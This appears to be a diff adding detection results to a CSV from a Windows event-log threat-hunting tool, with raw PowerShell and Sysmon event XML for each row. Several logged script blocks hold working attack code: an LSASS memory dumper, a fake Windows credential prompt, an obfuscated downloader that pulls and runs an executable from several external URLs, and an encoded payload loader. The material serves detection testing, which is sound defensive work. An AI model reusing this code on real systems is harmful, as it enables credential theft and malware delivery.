+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-PowerShell"" Guid=""A0C1853B-5C40-4B15-8766-3CF1C58F985A"">
+    </Provider>
+    <EventID>4104</EventID>
+    <Version>1</Version>
+    <Level>3</Level>
+    <Task>2</Task>
+    <Opcode>15</Opcode>
+    <Keywords>0x0</Keywords>
+    <TimeCreated SystemTime=""2020-06-30T14:24:08.254605Z"">
+    </TimeCreated>
+    <EventRecordID>971</EventRecordID>
+    <Correlation ActivityID=""4AA5EAE3-4F33-0001-3A2B-A64A334FD601"">
+    </Correlation>
+    <Execution ProcessID=""7008"" ThreadID=""6488"">
+    </Execution>
+    <Channel>Microsoft-Windows-PowerShell/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-21-3461203602-4096304019-2269080069-1000"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""MessageNumber"">1</Data>
+    <Data Name=""MessageTotal"">1</Data>
+    <Data Name=""ScriptBlockText"">function Memory($path) 
+{ 
+			   
+			   
+		$Process = Get-Process lsass 
+		$DumpFilePath = $path 
+		 
+		$WER = [PSObject].Assembly.GetType(&apos;System.Management.Automation.WindowsErrorReporting&apos;) 
+		$WERNativeMethods = $WER.GetNestedType(&apos;NativeMethods&apos;, &apos;NonPublic&apos;) 
+		$Flags = [Reflection.BindingFlags] &apos;NonPublic, Static&apos; 
+		$MiniDumpWriteDump = $WERNativeMethods.GetMethod(&apos;MiniDumpWriteDump&apos;, $Flags) 
+		$MiniDumpWithFullMemory = [UInt32] 2 
+	 
+			 
+			  # 
+		$ProcessId = $Process.Id 
+		$ProcessName = $Process.Name 
+		$ProcessHandle = $Process.Handle 
+		$ProcessFileName = &quot;$($ProcessName).dmp&quot; 
+		 
+		$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName 
+		 
+		$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) 
+			   
+		$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, 
+													$ProcessId, 
+													$FileStream.SafeFileHandle, 
+													$MiniDumpWithFullMemory, 
+													[IntPtr]::Zero, 
+													[IntPtr]::Zero, 
+													[IntPtr]::Zero)) 
+			   
+		$FileStream.Close() 
+		 
+		if (-not $Result) 
+		{ 
+			$Exception = New-Object ComponentModel.Win32Exception 
+			$ExceptionMessage = &quot;$($Exception.Message) ($($ProcessName):$($ProcessId))&quot; 
+			 
+			# Remove any partially written dump files. For example, a partial dump will be written 
+			# in the case when 32-bit PowerShell tries to dump a 64-bit process. 
+			Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue 
+			 
+			throw $ExceptionMessage 
+		} 
+		else 
+		{ 
+			&quot;Memdump complete!&quot; 
+		} 
+	 
+}</Data>
+    <Data Name=""ScriptBlockId"">27f08bda-c330-419f-b83b-eb5c0f699930</Data>
+    <Data Name=""Path"">C:\Users\Public\lsass_wer_ps.ps1</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
+powershell script block - Found Suspicious PowerShell commands ,1568036117.258414,2019-09-09T17:35:17.258414+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Password,New-Object,New-Object,$env:UserName,add,invoke,new-object,.pass,PromptForCredential,select-object,System.DirectoryServices.AccountManagement) , check event details ",4104,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-PowerShell"" Guid=""A0C1853B-5C40-4B15-8766-3CF1C58F985A"">
+    </Provider>
+    <EventID>4104</EventID>
+    <Version>1</Version>
+    <Level>3</Level>
+    <Task>2</Task>
+    <Opcode>15</Opcode>
+    <Keywords>0x0</Keywords>
+    <TimeCreated SystemTime=""2019-09-09T13:35:09.315230Z"">
+    </TimeCreated>
+    <EventRecordID>1123</EventRecordID>
+    <Correlation ActivityID=""B5ABE6C2-675C-0001-A601-ACB55C67D501"">
+    </Correlation>
+    <Execution ProcessID=""5500"" ThreadID=""356"">
+    </Execution>
+    <Channel>Microsoft-Windows-PowerShell/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-21-3461203602-4096304019-2269080069-1000"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""MessageNumber"">1</Data>
+    <Data Name=""MessageTotal"">1</Data>
+    <Data Name=""ScriptBlockText"">function Invoke-LoginPrompt{
+$cred = $Host.ui.PromptForCredential(&quot;Windows Security&quot;, &quot;Please enter user credentials&quot;, &quot;$env:userdomain\$env:username&quot;,&quot;&quot;)
+$username = &quot;$env:username&quot;
+$domain = &quot;$env:userdomain&quot;
+$full = &quot;$domain&quot; + &quot;\&quot; + &quot;$username&quot;
+$password = $cred.GetNetworkCredential().password
+Add-Type -assemblyname System.DirectoryServices.AccountManagement
+$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
+while($DS.ValidateCredentials(&quot;$full&quot;,&quot;$password&quot;) -ne $True){
+    $cred = $Host.ui.PromptForCredential(&quot;Windows Security&quot;, &quot;Invalid Credentials, Please try again&quot;, &quot;$env:userdomain\$env:username&quot;,&quot;&quot;)
+    $username = &quot;$env:username&quot;
+    $domain = &quot;$env:userdomain&quot;
+    $full = &quot;$domain&quot; + &quot;\&quot; + &quot;$username&quot;
+    $password = $cred.GetNetworkCredential().password
+    Add-Type -assemblyname System.DirectoryServices.AccountManagement
+    $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
+    $DS.ValidateCredentials(&quot;$full&quot;, &quot;$password&quot;) | out-null
+    }
+ $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password
+ $output
+ R{START_PROCESS}
+}
+Invoke-LoginPrompt</Data>
+    <Data Name=""ScriptBlockId"">c7ca7056-b317-4fff-b796-05d8ef896dcd</Data>
+    <Data Name=""Path""></Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
+powershell script block - Found Suspicious PowerShell commands ,1598418568.845521,2020-08-26T09:09:28.845521+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient) , check event details ",4104,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-PowerShell"" Guid=""A0C1853B-5C40-4B15-8766-3CF1C58F985A"">
+    </Provider>
+    <EventID>4104</EventID>
+    <Version>1</Version>
+    <Level>5</Level>
+    <Task>2</Task>
+    <Opcode>15</Opcode>
+    <Keywords>0x0</Keywords>
+    <TimeCreated SystemTime=""2020-08-26T05:09:28.845521Z"">
+    </TimeCreated>
+    <EventRecordID>683</EventRecordID>
+    <Correlation ActivityID=""CCAD9034-7B61-0001-83CF-ADCC617BD601"">
+    </Correlation>
+    <Execution ProcessID=""6620"" ThreadID=""6340"">
+    </Execution>
+    <Channel>Microsoft-Windows-PowerShell/Operational</Channel>
+    <Computer>DESKTOP-RIPCLIP</Computer>
+    <Security UserID=""S-1-5-21-2895499743-3664716236-3399808827-1001"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""MessageNumber"">1</Data>
+    <Data Name=""MessageTotal"">1</Data>
+    <Data Name=""ScriptBlockText"">$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;)</Data>
+    <Data Name=""ScriptBlockId"">fdd51159-9602-40cb-839d-c31039ebbc3a</Data>
+    <Data Name=""Path""></Data>
+  </EventData>
+</Event>",DESKTOP-RIPCLIP,Microsoft-Windows-PowerShell/Operational
+powershell script block - Found Suspicious PowerShell commands ,1568036109.31523,2019-09-09T17:35:09.315230+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (FromBase64String,Base64,New-Object,New-Object,new-object,readtoend,system.io.streamreader) , check event details ",4104,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-PowerShell"" Guid=""A0C1853B-5C40-4B15-8766-3CF1C58F985A"">
+    </Provider>
+    <EventID>4104</EventID>
+    <Version>1</Version>
+    <Level>3</Level>
+    <Task>2</Task>
+    <Opcode>15</Opcode>
+    <Keywords>0x0</Keywords>
+    <TimeCreated SystemTime=""2019-09-09T13:35:08.655802Z"">
+    </TimeCreated>
+    <EventRecordID>1122</EventRecordID>
+    <Correlation ActivityID=""B5ABE6C2-675C-0000-AAFD-ABB55C67D501"">
+    </Correlation>
+    <Execution ProcessID=""5500"" ThreadID=""356"">
+    </Execution>
+    <Channel>Microsoft-Windows-PowerShell/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-21-3461203602-4096304019-2269080069-1000"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""MessageNumber"">1</Data>
+    <Data Name=""MessageTotal"">1</Data>
+    <Data Name=""ScriptBlockText"">&amp;([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(&apos;H4sIAAlVdl0CA81UXW/aMBR996+4svJANJIfgNQHBNs6aaWIsO2hnSbXuaVeEzuyHdKI8d93YwIDTUJlfVkeLPme+3F87lEeay29Mho+6bV5xuSzWSk9t6as/IZF0mIOVxBdG+fTWqU74IOxEwJQeyWKAf+mdG4aBxnK2irf8iHweYHCIVAKWqgdHfJQ4bqECPV61AG5KYXS94e7FiXyIecxi/ZXYsBPcRbtyk6QXYiwx7ooAtJH4B3w+3BGRx0q4VxjbHhfRy79iH6GnkLPR6+L030eG+d5smwrhIQiWD4UbSCXtc5jmU6VRemNbTO0ayXRpWMpTa39jdBihSX1Y9E0o2kzbJLbh5+UfUEtSa+0VJUoJoZEffGDuwuK+5qO/ffR6EbIJ6UxZs2TKnBArNKvolC58Pjn5W7Ag5C0i4NUPIZEI0RLW2O8YUDfv1uEDNcNhaORQ+h9420LYtXt7nVWCUzO2CXgZywT8FfZJmRebJ2u6u32CbP/Mwv1nM4aCE4c9AtM7RNNSCjeMogoUNW+U1NjszfUGWGph8OCKCdmJ8IX2s+M1BzCNOyOjHSQvu/OYLHJluPF8sd8cTt5n2VbtmV///R+A6HMO3IQBQAA&apos;))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</Data>
+    <Data Name=""ScriptBlockId"">37f6d110-cfdf-4118-8748-17638e258531</Data>
+    <Data Name=""Path""></Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-05T20:43:58.451314Z"">
+    </TimeCreated>
+    <EventRecordID>2164892</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""5424"" ThreadID=""6708"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>LAPTOP-JU4M3I0E</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-05 20:43:58.450</Data>
+    <Data Name=""ProcessGuid"">00247C92-858E-5F7B-0000-0010E741202B</Data>
+    <Data Name=""ProcessId"">6636</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\windows\</Data>
+    <Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
+    <Data Name=""LogonGuid"">00247C92-8C36-5F75-0000-002034E39103</Data>
+    <Data Name=""LogonId"">0x391e334</Data>
+    <Data Name=""TerminalSessionId"">2</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">00247C92-858E-5F7B-0000-00105241202B</Data>
+    <Data Name=""ParentProcessId"">18404</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\Taskmgr.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\windows\system32\taskmgr.exe</Data>
+  </EventData>
+</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1556808617.955524,2019-05-02T18:50:17.955524+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7.home and IP ( 10.0.2.15 ) to hostname (  ) , IP ( 151.101.36.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-02T14:48:53.950750Z"">
+    </TimeCreated>
+    <EventRecordID>10272</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1960"" ThreadID=""132"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-02 14:48:51.664</Data>
+    <Data Name=""ProcessGuid"">365ABB72-0244-5CCB-0000-00109AE70B00</Data>
+    <Data Name=""ProcessId"">1508</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">IEWIN7.home</Data>
+    <Data Name=""SourcePort"">49178</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">151.101.36.133</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">443</Data>
+    <Data Name=""DestinationPortName"">https</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-02T16:24:28.640990Z"">
+    </TimeCreated>
+    <EventRecordID>339891</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3200"" ThreadID=""3032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-08-02 16:24:28.637</Data>
+    <Data Name=""ProcessGuid"">747F3D96-E8BC-5F26-0000-0010F7C41A00</Data>
+    <Data Name=""ProcessId"">588</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">whoami.exe</Data>
+    <Data Name=""CommandLine"">whoami</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-E308-5F26-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-E8BA-5F26-0000-001035BE1A00</Data>
+    <Data Name=""ParentProcessId"">8104</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;c:\windows\system32\cmd.exe&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1619129375.284604,2021-04-23T02:09:35.284604+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-04-22T22:09:35.284225Z"">
+    </TimeCreated>
+    <EventRecordID>564605</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3352"" ThreadID=""4696"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-04-22 22:09:35.263</Data>
+    <Data Name=""ProcessGuid"">747F3D96-F41F-6081-0000-001078834A00</Data>
+    <Data Name=""ProcessId"">6644</Data>
+    <Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Host Process for Windows Services</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">svchost.exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
+    <Data Name=""LogonGuid"">747F3D96-6E1A-6082-0000-0020E5030000</Data>
+    <Data Name=""LogonId"">0x3e5</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">624</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1596385468.64099,2020-08-02T20:24:28.640990+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;c:\windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-02T16:24:26.809904Z"">
+    </TimeCreated>
+    <EventRecordID>339890</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3200"" ThreadID=""3032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-08-02 16:24:26.803</Data>
+    <Data Name=""ProcessGuid"">747F3D96-E8BA-5F26-0000-001035BE1A00</Data>
+    <Data Name=""ProcessId"">8104</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;c:\windows\system32\cmd.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-E308-5F26-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-E309-5F26-0000-0010137B0000</Data>
+    <Data Name=""ParentProcessId"">820</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p</Data>
+  </EventData>
